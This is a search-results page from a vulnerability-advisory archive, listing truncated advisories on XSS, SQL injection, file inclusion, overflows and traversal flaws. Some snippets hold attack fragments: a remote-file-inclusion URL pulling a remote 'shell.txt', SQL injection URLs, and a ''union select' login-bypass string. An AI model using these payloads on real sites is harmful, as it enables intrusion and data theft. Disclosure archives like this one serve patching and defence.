47153 matches found
[Full-disclosure] [CVE-2007-2450]: Apache Tomcat XSS vulnerability in Manager
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 CVE-2007-2450: Apache Tomcat XSS vulnerabilities in Manager Severity: low cross-site scripting Vendor: The Apache Software Foundation Versions Affected: Tomcat 4.0.0 to 4.0.6 Tomcat 4.1.0 to 4.1.36 Tomcat 5.0.0 to 5.0.30 Tomcat 5.5.0 to 5.5.24 Tomcat...
Win32 Device Drivers Communication Vulnerabilities
Win32 Device Drivers Communication Vulnerabilities Proof Of Concept - Exploiting Norton AntiVirus Device Driver Written by Lord YuP / sEC-Labs ^ tkT Tested on NAV 2002! zipped exploit http://sec-labs.hack.pl DISCLAIMER: This paper is written in educational purposes only. Author, sEC-Labs, tkT tea...
Remote file upload vulnerability in videowhisper-video-conference-integration wordpress plugin v4.91.8
Title: Remote file upload vulnerability in videowhisper-video-conference-integration wordpress plugin v4.91.8 Author: Larry W. Cashdollar, @larry0 Date: 2015-03-29 Download Site: https://wordpress.org/support/plugin/videowhisper-video-conference-integration Vendor: http://www.videowhisper.com/...
HttpFileServer code execution
Code execution via GET request...
[USN-2165-1] OpenSSL vulnerabilities
========================================================================== Ubuntu Security Notice USN-2165-1 April 07, 2014 openssl vulnerabilities ========================================================================== A security issue affects these releases of Ubuntu and its derivatives: -...
[security bulletin] HPSBMU02894 rev.1 - HP Network Node Manager I (NNMi) for HP-UX, Linux, Solaris, and Windows, Remote Denial of Service (DoS), Unauthorized Access, Execution of Arbitrary Code
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Note: the current version of the following document is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emrna-c03824583 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c03824583 Version: 1 HPSBMU02894 rev....
Multiple vulnerabilities in PBBoard
Advisory ID: HTB23101 Product: PBBoard Vendor: www.pbboard.com Vulnerable Versions: 2.1.4 and probably prior Tested Version: 2.1.4 Vendor Notification: July 18, 2012 Public Disclosure: August 8, 2012 Vulnerability Type: SQL Injection CWE-89, Improper Authentication CWE-287, Improper Access Contro...
[DSECRG-11-033] SAP Crystal Report Server pubDBLogon - Linked ХSS vulnerability (by ERPScan)
DSECRG-11-033 SAP Crystal Report Server pubDBLogon - Linked ХSS vulnerability XSS vulnerability found in pubDBLogon.jsp page of SAP Crystal Report Server 2008. Application: SAP Crystal Report Server 2008 Versions Affected: SAP Crystal Report Server 2008 Vendor URL: http://www.sap.com Bugs: Linked...
Cisco IOS UDP Denial of Service Vulnerability
Cisco IOS UDP Denial of Service Vulnerability ------------------------------------------------------------------ I. Summary Cisco routers running IOS 15.0 allows a remote attacker to cause a denial of service via a flood of UDP packets a randomly chosen UDP port...
Writeup by Amit Klein (Trusteer): Address Bar Spoofing for IE6
Address Bar Spoofing Attacks against Microsoft Internet Explorer 6 Amit Klein, Trusteer Summary ======= IE6 is the second most popular web browser after IE7, with market share of around 25 according to recent surveys e.g. http://marketshare.hitslink.com/report.aspx?qprid=2. This write-up presents...
pfa CMS v6.0 (index.php repinc) Remote File Include Vulnerability
pfa CMS v6.0 // AYYILDIZ.ORG Gururla Sunar ! = OZELHAREKAT Author: iLker Kandemir [email protected] ScriptSite: http://pfa.netsliver.com/downloadpfa Tnx: H0tturk,Ekin0x,Dumenci,Gencnesil,Gencturk,Str0ke Exploit: http://site/pfapath/index.php?repinc=http://shell.txt?...
20/20 auto gallery [ multiples injection sql ]
vendor site:http://www.2020autogallery.com/ product:20/20 auto gallery bug:injection sql global risk:high injection sql get : http://site.com/vehiclelistings.asp?vehicleID='sql http://site.com/vehiclelistings.asp?categoryIDlist='sql http://site.com/vehiclelistings.asp?saletype='sql...
[Full-Disclosure] php-ping: Executing arbritary commands
ppp-design found the following design error in php-ping: Details ------- Product: php-ping Affected Version: no version information included in the script Immune Version: latest version OS affected: all OS with php Vendor-URL: http://www.theworldsend.net/ Vendor-Status: informed, new version...
vBulletin allows arbitrary code execution
OVERVIEW ======== vBulletin http://www.vbulletin.com is a commonly used web forum system written in PHP. One of its key features is use of templates, which allow the board administrator to dynamically modify the look of the board. vBulletin templates are parsed with the eval function. This could ...
ESA-2013-045: RSA BSAFE® SSL-C Security Update for SSL/TLS Plaintext Recovery (aka “Lucky Thirteen”) Vulnerability
ESA-2013-045.txt -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ESA-2013-045: RSA BSAFE® SSL-C Security Update for SSL/TLS Plaintext Recovery aka “Lucky Thirteen” Vulnerability EMC Identifier: ESA-2013-045 CVE Identifier: CVE-2013-0169 Severity Rating: CVSS v2 Base Score: 2.6...
[security bulletin] HPSBMA02658 SSRT100413 rev.1 - Insight Control for Linux (IC-Linux), Remote Unauthorized Elevation of Privilege, Execution of Arbitrary Code, Encryption Downgrade, Information Disclosure, Denial of Service (DoS)
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c02794777 Version: 1 HPSBMA02658 SSRT100413 rev.1 - Insight Control for Linux IC-Linux, Remote Unauthorized Elevation of Privilege, Execution of Arbitrary Code, Encryption Downgrade, Information...
PR10-07: Unauthenticated File Retrieval (traversal) within ColdFusion administration console
PR10-07: Unauthenticated File Retrieval traversal within ColdFusion administration console Vulnerability found: 17th April 2010 Vendor informed: 19th April 2010 Vulnerability fixed: 10th August 2010 Severity: High Description: Adobe ColdFusion is a easy to use and very widely adopted Programming...
XSS and Content Spoofing vulnerabilities in CKEditor
Hello 3APA3A! I want to warn you about Cross-Site Scripting and Content Spoofing vulnerabilities in CKEditor. XSS: This is Persistent XSS vulnerability. Attack is conducting via placing link with setting the style. a href="http://test"...
Multiple vulnerabilities in several ATEN IP KVM Switches
Jakob Lell from the TU Berlin computer security working group http://www.agrs.tu-berlin.de/v-menue/agrechnersicherheit/parameter/en/ has discovered multiple vulnerabilities in several ATEN IP KVM Switches. Affected products: - ATEN KH1516i IP KVM Switch browser firmware version 1.0.063 - ATEN...
[Full-disclosure] Persits Software XUpload Control Buffer Overflow Exploit
I tried posting this yesterday, don't know what happened, anyhow, my advance apologies for any double posts. I took a shot at writing an exploit for this, so here goes. Code is inline and attached. ------------------------- !-- written by e.b. Persits Software XUpload Control AddFolder Buffer...
FCKEditor File Upload Vulnerability
Description: There is no validation on the extensions when FCKEditor 2.6.8 ASP version is dealing with the duplicate files. As a result, it is possible to bypass the protection and upload a file with any extension. - Reference: http://www.exploit-db.com/exploits/23005/ vulnerable versions: prior...
Phorum < 5.2.10 Cross-Site Scripting/Request Forgery
=cicatriz [email protected]==advisories= / / / / // / / // / o / / .-/ =Phorum 5.2.10 Cross-Site Scripting/Request Forgery==/= == =Advisory & Vulnerability Information=== Title: Phorum 5.2.10 Cross-Site Scripting/Request Forgery Advisory ID: VUDO-2009-1504 Advisory URL:...
Simple PHP Blog (sphpblog) <= 0.5.1 Multiple Vulnerabilities
Title: Simple PHP Blog sphpblog = 0.5.1 Multiple Vulnerabilities Vendor: http://sourceforge.net/projects/sphpblog/ Advisory: http://acid-root.new.fr/?0:15 Author: DarkFig gmdarkfig at gmail dot com Released on: 2007/10/21 Changelog: ---------- L M H T Summary: Ip Spoofing X X Cross Site Scripting...
Battle.net Clan Script for PHP 1.5.1 Remote SQL Injection Vulnerability
script : Battle.net Clan Script 1.5 file : login.php attack : injection sql auteur : h a c k e r X code : ------------------------------------------------------------------------------------------ line 9 -- $user = $POST'user'; line 10-- $pass = $POST'pass'; ..... ..... ..... line 21--...
OPENi-CMS 1.0.1(config) Remote File Inclusion Vulnerability
Update: 22:44 09/11/06 Subject: "OPENi-CMS 1.0.1config Remote File Inclusion Vulnerability " Vulnerable version: OPENi-CMS 1.0.1 Operating System: - All OS Vendor URL: Support - [email protected] Website - http://www.openi-cms.org/ Description: Openi-CMS he one software PHP Content Management...
Apache 2.0.39 directory traversal and path disclosure bug
Auriemma Luigi, PivX security advisory AL001 Application: Apache WebServer http://httpd.apache.org Version: 2.0.39 and previous 2.0.x, ONLY on systems that supports backslash path delimiters Win/Netware/OS2 etc... Bug: Directory traversal vulnerability and path disclosure Risk high: An attacker c...
[USN-2744-1] Apport vulnerability
========================================================================== Ubuntu Security Notice USN-2744-1 September 24, 2015 apport vulnerability ========================================================================== A security issue affects these releases of Ubuntu and its derivatives: -...
Wolf CMS 0.8.2 Arbitrary File Upload Vulnerability
,--^----------,--------,-----,-------^--, | ||||||||| --------' | O .. CWH Underground Hacking Team .. +---------------------------^----------| ,-------, | / XXXXXX /| / / XXXXXX / / / XXXXXX / / XXXXXX / / XXXXXX / ------' Exploit Title : Wolf CMS Arbitrary File Upload Exploit Date : 16 April 20...
Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc...
SEC Consult SA-20130625-0 :: Multiple vulnerabilities in IceWarp Mail Server
SEC Consult Vulnerability Lab Security Advisory 20130625-0 ======================================================================= title: Multiple vulnerabilities in IceWarp Mail Server product: IceWarp Mail Server vulnerable version: =10.4.5 fixed version: 10.4.5-1 impact: Critical homepage:...
Multiple vulnerabilities in Help Desk Software
Vulnerability ID: HTB23041 Reference: https://www.htbridge.ch/advisory/multiplevulnerabilitiesinhelpdesksoftware.html Product: Help Desk Software Vendor: freehelpdesk.org http://freehelpdesk.org/ Vulnerable Version: 1.1b and probably prior Tested Version: 1.1b Vendor Notification: 17 August 2011...
phpBB AJAX Chat/Shoutbox MOD CSRF Vulnerability
View here: https://www.stevenroddis.com/phpbb-ajax-chatshoutbox-mod-csrf-vulnerability/ Title: phpBB AJAX Chat/Shoutbox MOD CSRF Vulnerability Release Date: 2011-04-30 Product Affected: http://startrekaccess.com/community/viewtopic.php?f=127&t=8675 Responsible Disclosure: After repeated attempts ...
Directory Traversal Vulnerability in Viola DVR VIO-4/1000
============================================================== Viola DVR VIO-4/1000 - Directory Traversal Vulnerability ============================================================== Software: Viola DVR VIO-4/1000 other products may be affected Vendor: http://www.videcon.co.uk/ Vuln Type: Directo...
WebSPELL <= 4.01.02 (picture.php) Remote File Disclosure Vulnerability
WebSPELL = 4.01.02 picture.php Remote File Disclosure Vulnerability Discovered by: Trex Visit: www.Trex-Online.net / www.UnderGround.ag Comment: Happy easter! / / / / / / / // / GIVE ME A CARROT OR I WILL O O/ BLOW UP YOUR HOUSE / / ^ / / / // / // /// Vulnerability 1: Advantage: works...
[Aria-Security Team] MyBB Cross-Site Scripting
Aria-Security Team http://Aria-Security.com http://www.aria-security.com/forum/showthread.php?p=144 Contact: [email protected] Type:Remote Cross-Site Scripting Article on XSS: http://aria-security.net/xss.rar Discovered By Aria-Security Team Software: MyBB Explanation: First of all user...
ASPTicker 1.0 (admin.asp) Remote Login ByPass SQL Injection Vulnerability
Title : ASPTicker 1.0 admin.asp Remote Login ByPass SQL Injection Vulnerability Author : ajann Contact : : S.Page : http://www.aspapps.com $$ : $ 17.00 SQL--------------------------------------------------------- http://target/path//admin.aspByPass Example: //Password 'union select 0,0,0 from...
PHP Event Calendar versi 1.4 (path_to_calendar) Remote File Inclusion
SolpotCrew Community PHP Event Calendar versi 1.4 pathtocalendar Remote File Inclusion Vendor site : http://www.softcomplex.com/products/phpeventcalendar/ Bug Found By :Solpot a.k.a k. Hasibuan 13th july 2006 contact: [email protected] Website : http://www.solpotcrew.org/adv/solpot-adv-01.t...
[EEYEB20050708] Microsoft Distributed Transaction Coordinator Memory Modification Vulnerability
Microsoft Distributed Transaction Coordinator Memory Modification Vulnerability Release Date: October 11, 2005 Date Reported: July 8, 2005 Severity: High Remote Code Execution Vendor: Microsoft Systems Affected: Windows 2000 Server SP0 - SP4 - Vulnerable - Anonymous remotely exploitable by defaul...
twlc advisory: all versions of php nuke are vulnerable...
twlc security divison 24/09/2001 Php nuke BUGGED. Found by: LucisFero and supergate ./twlc Summary This time the bug is really dangerous...it allows you to 'cp' any file on the box... or even upload files... Systems Affected all the versions ARE vulnerable except '5.0 RC1' i wonder why a released...
ntp multiple security vulnerabilities
Multiple memory corruptions...
Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc...
Barracuda Networks Web Application Firewall v6.1.5 & LoadBalancer v4.2.2 #37 - Filter Bypass & Multiple Vulnerabilities
Document Title: =============== Barracuda Networks Web Application Firewall v6.1.5 & LoadBalancer v4.2.2 37 - Filter Bypass & Multiple Vulnerabilities References Source: ==================== http://www.vulnerability-lab.com/getcontent.php?id=1103 Barracuda Networks Security ID BNSEC: BNSEC-1263...
BF and IA vulnerabilities in IBM Lotus Domino
Hello 3APA3A! I want to warn you about Brute Force and Insufficient Authentication vulnerabilities in IBM Lotus Domino. These are vulnerabilities in Domino, which I've found at 03.05.2012 together with other holes. Last year I've announced multiple vulnerabilities in IBM software and after IBM...
FortiWeb 4kC,3kC,1kC & VA - Cross Site Vulnerabilities
Title: ====== FortiWeb 4kC,3kC,1kC & VA - Cross Site Vulnerabilities Date: ===== 2012-12-01 References: =========== http://www.vulnerability-lab.com/getcontent.php?id=702 VL-ID: ===== 702 Common Vulnerability Scoring System: ==================================== 2.1 Introduction: =============...
Mozilla Firefox / Thunderbird / Seamonkey multiple security vulnerabilities
Information leakage, multiple memory corruptions, crossite scripting, etc...
[ MDVSA-2008:050 ] - Updated cups packages fix multiple vulnerabilities
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Mandriva Linux Security Advisory MDVSA-2008:050 http://www.mandriva.com/security/ Package : cups Date : February 26, 2008 Affected: Corporate 3.0 Problem Description: Dave Camp at Critical Path Software discovered a buffer overflow in CUPS 1.1.23 and...
[Full-disclosure] Some 0day Pocs
Mati Aharoni muts .@. offensive-security.com mailto:[email protected] http://www.offensive-security.com My 7 line python fuzzer found several file format bugs in 3 hours. Quite alarming. No deep analysis was done, I leave that to the community. These are some of the results: file789-1.d...
Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc...
Mafia Moblog <= 6 (pathtotemplate) Remote File Inclusion Vulnerability
------------------------------------------------------------------------ ------------------- Mafia Moblog pathtotemplate Remote File Inclusion ------------------------------------------------------------------------ ------------------- Author : Sh3ll Date : 2006/04/30 HomePage : http://www.sh3ll....
[waraxe-2004-SA#031 - Multiple vulnerabilities in e107 version 0.615]
================================================================================ waraxe-2004-SA031 ================================================================================ Multiple vulnerabilities in e107 version 0.615...